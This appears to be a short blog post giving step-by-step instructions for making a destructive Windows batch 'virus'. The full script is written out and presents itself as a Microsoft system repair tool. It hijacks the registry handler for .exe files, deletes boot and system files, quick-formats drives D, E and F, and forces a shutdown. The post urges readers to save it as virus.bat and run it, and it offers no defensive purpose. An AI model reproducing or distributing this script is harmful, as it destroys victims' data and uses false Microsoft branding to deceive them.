In Making Viruses It's quite easy, but remember not to be used carelessly science is ^ _ ^
The first - Open your Notepad with the steps: Start> All Programs> Notepad
Second - copy the script below to your notepad :
@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit
The third - save with any name with the extension. bat, examples virus.bat
The fourth - had run virus.bat
fifth - see the results ... Good Luck ^ _ ^
0 komentar:
Posting Komentar